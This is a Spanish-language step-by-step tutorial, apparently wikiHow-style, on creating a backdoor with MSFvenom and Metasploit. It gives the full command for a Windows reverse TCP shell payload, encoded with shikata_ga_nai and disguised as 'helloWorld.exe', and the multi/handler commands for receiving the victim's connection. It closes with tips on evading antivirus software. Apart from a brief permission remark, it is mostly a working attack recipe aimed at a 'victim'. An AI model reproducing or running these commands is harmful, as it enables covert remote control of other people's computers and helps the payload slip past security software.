Se utiliza una puerta trasera para eludir los mecanismos de seguridad, a menudo de forma secreta y, en su mayoría, de forma indetectable. Usando MSFvenom, la combinación de msfpayload y msfencode, es posible crear una puerta trasera que se conecte de nuevo al atacante usando TCP de shell inverso. Para desarrollar una puerta trasera, debe cambiar la firma de su malware para evadir cualquier software antivirus. Complete este proyecto en un par de computadoras a las que tenga permiso de acceso y, en el proceso, aprenderá más sobre la seguridad informática y cómo funciona este tipo de puerta trasera.
Pasos
Paso 1. Inicie Kali y encienda la consola Terminal
Paso 2. Escriba ifconfig para mostrar la interfaz y verifique su dirección IP
Paso 3. Escriba codificadores msfvenom -l para mostrar la lista de codificadores
Utilizará x86 / shikata_ga_nai como codificador
Paso 4. Escriba "msfvenom -a x86 --platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe
- -a x86: la plataforma Windows designa la arquitectura que se utilizará.
- -p windows / shell / reverse_tcp designa las cargas útiles para incrustar.
- LHOST designa la dirección IP del oyente.
- LPORT designa el puerto de escucha.
- -b "\ x00" designa para evitar caracteres incorrectos (bytes nulos).
- -e x86 / shikata_ga_nai designa el nombre del codificador.
- -f exe> helloWorld.exe designa la salida de formato.
Paso 5. Escriba msfconsole para activar Metasploit
Ahora ha generado su puerta trasera. Cuando la víctima haga clic en helloWorld.exe, la carga útil de shell que está incrustada se activará y se conectará de nuevo a su sistema. Para recibir la conexión, debe abrir el controlador múltiple en Metasploit y configurar las cargas útiles
Paso 6. Escriba use exploit / multi / handler
Paso 7. Escriba set payload windows / shell / reverse_tcp
Paso 8. Escriba show options para verificar el módulo
Paso 9. Escriba set LHOST 192.168.48.129
"LHOST" designa la dirección IP del oyente
Paso 10. Escriba set LPORT 4444
"LPORT" designa el puerto de escucha
Paso 11. Escriba ejecutar y espere la conexión de la máquina de la víctima
Paso 12. Espere a que la víctima haga clic en helloWorld.exe
Entonces se conectará con éxito a la máquina de la víctima.
Consejos
- El uso de -i en MSFvenom representará las iteraciones de la codificación. A veces, más iteraciones pueden ayudar a evadir el software AV.
- Ha aprendido cómo generar la puerta trasera y codificar utilizando MSFvenom, pero este método no funcionará perfectamente con algunos de los programas de software AV de hoy en día. La razón detrás de esto se debe a las plantillas de ejecución en MSFvenom. Los proveedores de AV han agregado la firma estática de estas plantillas y simplemente búsquenlas. La solución para este problema es utilizar una plantilla de ejecución diferente o herramientas diferentes.